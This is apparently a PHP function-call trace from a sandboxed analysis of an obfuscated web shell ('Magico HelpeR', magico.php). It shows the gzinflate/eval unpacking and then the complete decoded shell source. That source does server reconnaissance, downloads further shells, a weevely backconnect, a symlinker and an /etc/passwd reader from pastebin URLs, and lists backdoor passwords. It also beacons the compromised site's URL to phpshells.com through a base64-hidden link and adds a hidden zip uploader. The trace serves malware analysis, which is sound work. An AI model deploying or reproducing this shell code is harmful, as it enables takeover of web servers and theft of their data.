3	9	R			'\001�\n\037�\001�\n$�x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA'
3	10	0	0.000638	404416	gzinflate	0		/var/www/html/uploads/magico.php(4) : eval()'d code	1	1	'\001�\n\037�\001�\n$�x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA'
3	10	1	0.000836	407520
3	10	R			'\001�\n$�x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA��\f�\017bh�'
3	11	0	0.000932	403392	gzinflate	0		/var/www/html/uploads/magico.php(4) : eval()'d code	1	1	'\001�\n$�x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA��\f�\017bh�'
3	11	1	0.001023	406496
3	11	R			'x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA��\f�\017bh��I��̶x9�'
3	12	0	0.001123	403392	gzuncompress	0		/var/www/html/uploads/magico.php(4) : eval()'d code	1	1	'x��Z�R�J\022�\rU��D���,�pq�\020�\000�\0016�\022c`\t�\\#il)�-\032��ds^e���{���{F�\r9\030٧*��\004K���{zfzZ�c\004�UYZ�1\030���f\001%��\004�\t�J��\002��!�A}΂���Ynk��:��,-\032A��ط�씕�S.�yLAV�\031X���~ANh��\\r�,���?ɹ�]\030̲x��k��NA�B�B\004\004nUW�\021\036�,VVT��[�\033:zNs-��&�\005�\000�|�[j��J���\033\000F-�i����\025�RH�\017�)�\023=�JktK\025hu�\023\vC�s���l\023�5�7Je�{ԉ�Ge��6���N\001�$���c���*Y/n\nj�\004s��l\031\001(�Zz,%���1\020\0046�}7�����}ԝ�\023�Qb��YVp\020�v��\031\036����vA��\f�\017bh��I��̶x9�'
3	12	1	0.001257	415712
3	12	R			'<html>\r\n<head>\r\n<meta content="text/html; charset=ISO-8859-1"\r\nhttp-equiv="content-type">\r\n<title>.:! Magico HelpeR | PhpShells.Com :.</title>\r\n</head>\r\n\r\n<body style="background-color: black; color: rgb(0, 0, 0);"\r\nalink="#ee0000" link="#0000ee" vlink="#551a8b">\r\n<div style="text-align: left;"><span style="color: rgb(0, 153, 0);"></span><span\r\nstyle="color: rgb(51, 204, 0); font-weight: bold;"><span\r\nstyle="color: rgb(153, 153, 0);">.:!~@</span># </span><span\r\n\r\nstyle="color: red;'
3	13	0	0.001502	458728	eval	1	'?><html>\r\n<head>\r\n<meta content="text/html; charset=ISO-8859-1"\r\nhttp-equiv="content-type">\r\n<title>.:! Magico HelpeR | PhpShells.Com :.</title>\r\n</head>\r\n\r\n<body style="background-color: black; color: rgb(0, 0, 0);"\r\nalink="#ee0000" link="#0000ee" vlink="#551a8b">\r\n<div style="text-align: left;"><span style="color: rgb(0, 153, 0);"></span><span\r\nstyle="color: rgb(51, 204, 0); font-weight: bold;"><span\r\nstyle="color: rgb(153, 153, 0);">.:!~@</span># </span><span\r\n\r\nstyle="color: red; font-weight: bold;"><a href="https://phpshells.com/"> Magico Helper </a></span><span\r\nstyle="font-weight: bold;"> </span><span\r\nstyle="color: rgb(51, 204, 0); font-weight: bold;">#<span\r\nstyle="color: rgb(153, 153, 0);">@~!:.</span></span><span\r\nstyle="color: white;"></span>\r\n<span style="font-weight: bold;"></span><br>\r\n<span style="font-weight: bold;"><img\r\nstyle="width: 300px; height: 150px;" alt=""\r\nsrc="https://phpshells.com/wp-content/themes/phpshells/images/logo.png"></span><br>\r\n<span style="font-weight: bold;"></span><small><span\r\nstyle="color: rgb(0, 153, 0);"><big><small><b>.: <span\r\nstyle="color: rgb(204, 153, 51);">Server InFo </span>:.</b></small></big></span></small><br>\r\n<small><span style="color: rgb(0, 153, 0);"><big>\r\n<small>---------------------------------------------------------------------------------------<br>\r\n<?php \r\nset_time_limit(0);\r\nerror_reporting(0);\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Server Software   : </span></b>".$_SERVER[\'SERVER_SOFTWARE\']."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Server Admin      : </span></b>".$_SERVER[\'SERVER_ADMIN\']."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> User              : </span></b>".get_current_user()."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Server IP         : </span></b>".$_SERVER[\'SERVER_ADDR\']."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Your IP           : </span></b>".$_SERVER["REMOTE_ADDR"]."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Uname             : </span></b>".php_uname()."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Php version       : </span></b>".phpversion()."<br>";\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Dir               : </span></b>".getcwd()."<br>";\r\n////////////////////////////////////\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Safe Mode         : </span></b>";\r\n\tif(@ini_get(\'safe_mode\') or strtolower(@ini_get(\'safe_mode\')) == \'on\'){\r\n\t\techo "<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t\t\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>"; }\r\necho "<br>";\r\n//////////////////////////////////\r\necho "<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Curl                 :</span></b>";\r\n\tif(function_exists("curl_version")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Perl                 :</span></b>";\r\n\tif(function_exists("perl -h")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Python                 :</span></b>";\r\n\tif(function_exists("python -h")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\t\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Bash                 :</span></b>";\r\n\tif(function_exists("bash -h")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Mysql                 :</span></b>";\r\n\tif(function_exists("mysql_connect")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\t\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Mssql                 :</span></b>";\r\n\tif(function_exists("mssql_connect")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Oracle                 :</span></b>";\r\n\tif(function_exists("ocilogon")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\t\r\necho " - <b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Postgrase                 :</span></b>";\r\n\tif(function_exists("pg_connect")){\r\n\t\techo"<span style=\\"font-weight: bold; color: red;\\">On</span>";\r\n\t}else{ echo"<span style=\\"color: rgb(153, 153, 153);\\">Off</span>";}\r\n\r\n//////////////////////////////////\r\necho "<br><b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Disable_functions  : </span></b>";\r\n\r\n\t$disable_funs = @ini_get(\'disable_functions\');\r\n\t$arr = explode(\',\', $disable_funs);\r\n\tforeach($arr as $fun){\r\n\t\techo "<span style=\\"font-weight: bold; color: red;\\">$fun</span>"." - ";\r\n\t}\r\n\r\n\r\n/* or\r\n\t$funs =array("system","exec","shell_exec","passthru","ln","copy","symlink","show_source","mail");\r\n\t\tforeach($funs as $fun){\r\n\t\t\tif(!function_exists($fun)){\r\n\t\t\t\techo $fun." - ";\r\n\t\t\t}\r\n\t\t}*/\r\n//////////////////////////////\r\necho"<br>";\r\necho"---------------------------------------------------------------------------------------------------------------------------------------------------<br><br>";\r\necho\'<form method="post">\r\n<b>[#]<span style=\\"color: rgb(51, 204, 0);\\"> Tools Grabber : <b></span><select name="tools" >\r\n<option>===================</option>\r\n<option>hidden uploader</option>\r\n<option>k2ll33d shell</option>\r\n<option>x shell</option>\r\n<option>2015priv8bypass</option>\r\n<option>fwso shell</option>\r\n<option>awso shell</option>\r\n<option>mass</option>\r\n<option>/etc/passwd</option>\r\n<option>server users</option>\r\n<option>backconnect weevely</option>\r\n<option>turbo cpanel</option>\r\n<option>symlinker</option>\r\n<option>adminer</option>\r\n<option>mailer</option>\r\n<option>Magico pws</option>\r\n<option>safe mode</option>\r\n<option>404 shell</option>\r\n<option>wp mass info changer</option>\r\n<option>jo mass info changer</option>\r\n\r\n</select>\r\n<input type="submit" name="get" value="Get" />\r\n</form>\';\r\n/////////////////////////////////////////////////////////////////\r\nif(isset($_POST[\'get\'])){\r\n\tswitch($_POST[\'tools\']){\r\n\t\r\n\t\tcase "x shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=vYzbTTs8\',\'oop.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "2015priv8bypass":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=5CRWPuPN\',\'r00t.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "hidden uploader":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=cf8nikzF\',\'upx.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "awso shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=0USmsjpW\',\'awso.php\');\r\n\t\tbreak;\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "mass":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=dWAksQgN\',\'mass.php\');\r\n\t\tbreak;\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "/etc/passwd":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=KbwUY0aR\',\'passwd.php\');\r\n\t\tbreak;\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "k2ll33d shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=8mwwA4V2\',\'k.php\');\r\n\t\tbreak;\t\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "fwso shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=f2VWCsNY\',\'fwso.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "adminer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=BZHXtZqu\',\'adminer.php\');\r\n\t\tbreak;\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "backconnect weevely":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=6YkfqzQ1\',\'bc.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "turbo cpanel":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=svbEfUPF\',\'turbo.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "symlinker":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=9zQFua4Z\',\'symv4.php\');\r\n\t\tbreak;\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "server users":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=5VKD1nEk\',\'users.php\');\r\n\t\tbreak;\t\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "mailer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=9zzgByV6\',\'wp-mailer.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "Magico pws":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=r2mpC2tL\',\'pws.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "safe mode":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=Te1e1uhA\',\'php.ini\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "404 shell":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=0c3TeKDu\',\'404.php\');\r\n\t\tbreak;\t\t\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "wp mass info changer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=uNqDPzjR\',\'wp-masser.php\');\r\n\t\tbreak;\r\n\t\t//////////////////////////////////////////////\r\n\t\tcase "jo mass info changer":\r\n\t\techo phpshells(\'http://pastebin.com/raw.php?i=gvEdgkyK\',\'jo-masser.php\');\r\n\t\tbreak;\r\n\t\t\t\t\r\n\t\r\n\t\t} // switch end\r\n}// end if\r\n////////////////////////////////////////////////////////////////\r\n// by INJECTOR_MA\r\nfunction phpshells($input,$output){\r\n\t@mkdir(\'phpshells\');\r\n\t@chdir(\'./phpshells\');\r\n\t\r\n\tif(!file_exists($output)){\r\n\t\t\r\n\t$cn = @file_get_contents($input);\r\n\t$save = fopen("$output","a+"); fwrite($save,@file_get_contents($input)); fclose($save);\r\n\treturn "<br>[#]DoNe: <a href=\\"./phpshells/$output\\"> Go to Here </a>";\r\n\t}else{ return "<br>[#] Allready Here : <a href=\\"./phpshells/$output\\"> Go to Here </a>"; }\r\n\t\r\n}\t\t\t\t\r\n///////////////////////////////////////////////////////////////\r\n\r\n?>\r\n\r\n<br><br><br><br>\r\n<span style="color: rgb(0, 153, 0);">[#]</span> <span\r\nstyle="color: rgb(0, 153, 0);"><span style="color: rgb(51, 204, 0);"><span\r\nstyle="color: rgb(153, 51, 153);">Please\r\nNotice</span> :</span> the password of the <span\r\nstyle="color: rgb(51, 204, 0);">[ weevely backdoor</span> ] is <span\r\nstyle="color: rgb(153, 153, 0);">123456</span></span>\r\n<br>\r\n<span\r\nstyle="color: rgb(0, 153, 0);">[#] the user of [<span\r\nstyle="color: rgb(51, 204, 0);"> fwso shell</span>\r\n] is <span style="color: rgb(153, 153, 0);">magico</span> and the\r\npassword is <span style="color: rgb(153, 153, 0);">xmagico</span></span>\r\n<span style="color: rgb(0, 153, 0);"></span>\r\n<br>\r\n<span style="color: rgb(0, 153, 0);">[#] to view <span\r\nstyle="color: rgb(51, 204, 0);">the hidden uplouder</span> write (<span\r\nstyle="color: rgb(153, 153, 0);">up.php?x=x</span>) </span><br>\r\n<span style="color: rgb(0, 153, 0);">[#] The Pass of <span\r\nstyle="color: rgb(51, 204, 0);">404 shell</span> is</span><span\r\nstyle="color: rgb(255, 204, 51);"> <span\r\nstyle="color: rgb(204, 153, 51);">katibprv8</span></span>\r\n<br><b>...::::::: PhpShells.Com ::::::::...</b>\r\n\r\n</big></span></body></html>\r\n\r\n<?php\r\necho \'<link rel="stylesheet" type="text/css" href="\'.base64_decode("aHR0cHM6Ly9waHBzaGVsbHMuY29tL2hpZGUvYWRkLnBocD9saW5rPWVhc3ljb2RlcjovLw==").$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'].\'">\';?>\r\n\r\n<?php\r\nif(isset($_GET["katib"])){\r\n  echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';\r\n  echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';\r\n  if( $_POST[\'_upl\'] == "Upload" ) {\r\n  $file = $_FILES[\'file\'][\'name\'];\r\n  if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) {\r\n  $zip = new ZipArchive;\r\n  if ($zip->open($file) === TRUE) {\r\n     $zip->extractTo(\'./\');\r\n     $zip->close();\r\n  echo \'Yükleme Başarılı\';\r\n  } else {\r\n  echo \'Yüklenmedi.\';\r\n  }\r\n  }else{\r\n  echo \'<b>Basarisiz</b><br><br>\';\r\n  }\r\n  }\r\n}\r\n?>'	/var/www/html/uploads/magico.php(4) : eval()'d code	1	0
4	14	0	0.001739	458728	set_time_limit	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	29	1	0
4	14	1	0.001758	458792
4	14	R			FALSE
4	15	0	0.001773	458760	error_reporting	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	30	1	0
4	15	1	0.001788	458800
4	15	R			22527
4	16	0	0.001803	458760	get_current_user	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	33	0
4	16	1	0.001847	458800
4	16	R			'osboxes'
4	17	0	0.001864	458768	php_uname	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	36	0
4	17	1	0.001880	458880
4	17	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	18	0	0.001900	458768	phpversion	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	37	0
4	18	1	0.001913	458832
4	18	R			'7.2.34-37+ubuntu22.04.1+deb.sury.org+1'
4	19	0	0.001929	458768	getcwd	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	38	0
4	19	1	0.001944	458816
4	19	R			'/var/www/html/uploads'
4	20	0	0.001959	458768	ini_get	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	41	1	'safe_mode'
4	20	1	0.001974	458800
4	20	R			FALSE
4	21	0	0.001988	458768	ini_get	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	41	1	'safe_mode'
4	21	1	0.002002	458800
4	21	R			FALSE
4	22	0	0.002015	458768	strtolower	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	41	1	FALSE
4	22	1	0.002029	458800
4	22	R			''
4	23	0	0.002042	458768	function_exists	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	48	1	'curl_version'
4	23	1	0.002057	458808
4	23	R			TRUE
4	24	0	0.002071	458768	function_exists	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	53	1	'perl -h'
4	24	1	0.002085	458808
4	24	R			FALSE
4	25	0	0.002098	458768	function_exists	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	58	1	'python -h'
4	25	1	0.002112	458808
4	25	R			FALSE
4	26	0	0.002125	458768	function_exists	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	63	1	'bash -h'
4	26	1	0.002139	458808
4	26	R			FALSE
4	27	0	0.002152	458768	function_exists	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	68	1	'mysql_connect'
4	27	1	0.002166	458808
4	27	R			FALSE
4	28	0	0.002179	458768	function_exists	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	73	1	'mssql_connect'
4	28	1	0.002193	458808
4	28	R			FALSE
4	29	0	0.002205	458768	function_exists	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	78	1	'ocilogon'
4	29	1	0.002222	458808
4	29	R			FALSE
4	30	0	0.002236	458768	function_exists	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	83	1	'pg_connect'
4	30	1	0.002250	458808
4	30	R			FALSE
4	31	0	0.002262	458768	ini_get	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	90	1	'disable_functions'
4	31	1	0.002277	459248
4	31	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
3		A						/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	90	$disable_funs = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4	32	0	0.002324	459216	explode	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	91	2	','	'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
4	32	1	0.002348	461688
4	32	R			[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
3		A						/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	91	$arr = [0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
4	33	0	0.002437	461728	base64_decode	0		/var/www/html/uploads/magico.php(4) : eval()'d code(1) : eval()'d code	261	1	'aHR0cHM6Ly9waHBzaGVsbHMuY29tL2hpZGUvYWRkLnBocD9saW5rPWVhc3ljb2RlcjovLw=='
4	33	1	0.002458	461872
4	33	R			'https://phpshells.com/hide/add.php?link=easycoder://'
3	13	1	0.002477	461728
2	7	1	0.002489	420312
			0.002524	339048
TRACE END   [2023-02-13 02:05:06.025592]


Generated HTML code
<html><head>
<meta content="text/html; charset=ISO-8859-1" http-equiv="content-type">
<title>.:! Magico HelpeR | PhpShells.Com :.</title>
</head>

<body style="background-color: black; color: rgb(0, 0, 0);" alink="#ee0000" link="#0000ee" vlink="#551a8b">
<div style="text-align: left;"><span style="color: rgb(0, 153, 0);"></span><span style="color: rgb(51, 204, 0); font-weight: bold;"><span style="color: rgb(153, 153, 0);">.:!~@</span># </span><span style="color: red; font-weight: bold;"><a href="https://phpshells.com/"> Magico Helper </a></span><span style="font-weight: bold;"> </span><span style="color: rgb(51, 204, 0); font-weight: bold;">#<span style="color: rgb(153, 153, 0);">@~!:.</span></span><span style="color: white;"></span>
<span style="font-weight: bold;"></span><br>
<span style="font-weight: bold;"><img style="width: 300px; height: 150px;" alt="" src="https://phpshells.com/wp-content/themes/phpshells/images/logo.png"></span><br>
<span style="font-weight: bold;"></span><small><span style="color: rgb(0, 153, 0);"><big><small><b>.: <span style="color: rgb(204, 153, 51);">Server InFo </span>:.</b></small></big></span></small><br>
<small><span style="color: rgb(0, 153, 0);"><big>
<small>---------------------------------------------------------------------------------------<br>
<b>[#]<span style="color: rgb(51, 204, 0);"> Server Software   : </span></b>Apache/2.4.52 (Ubuntu)<br><b>[#]<span style="color: rgb(51, 204, 0);"> Server Admin      : </span></b>webmaster@localhost<br><b>[#]<span style="color: rgb(51, 204, 0);"> User              : </span></b>osboxes<br><b>[#]<span style="color: rgb(51, 204, 0);"> Server IP         : </span></b>::1<br><b>[#]<span style="color: rgb(51, 204, 0);"> Your IP           : </span></b>::1<br><b>[#]<span style="color: rgb(51, 204, 0);"> Uname             : </span></b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br><b>[#]<span style="color: rgb(51, 204, 0);"> Php version       : </span></b>7.2.34-37+ubuntu22.04.1+deb.sury.org+1<br><b>[#]<span style="color: rgb(51, 204, 0);"> Dir               : </span></b>/var/www/html<br><b>[#]<span style="color: rgb(51, 204, 0);"> Safe Mode         : </span></b><span style="color: rgb(153, 153, 153);">Off</span><br><b>[#]<span style="color: rgb(51, 204, 0);"> Curl                 :</span></b><span style="font-weight: bold; color: red;">On</span> - <b>[#]<span style="color: rgb(51, 204, 0);"> Perl                 :</span></b><span style="color: rgb(153, 153, 153);">Off</span> - <b>[#]<span style="color: rgb(51, 204, 0);"> Python                 :</span></b><span style="color: rgb(153, 153, 153);">Off</span> - <b>[#]<span style="color: rgb(51, 204, 0);"> Bash                 :</span></b><span style="color: rgb(153, 153, 153);">Off</span> - <b>[#]<span style="color: rgb(51, 204, 0);"> Mysql                 :</span></b><span style="color: rgb(153, 153, 153);">Off</span> - <b>[#]<span style="color: rgb(51, 204, 0);"> Mssql                 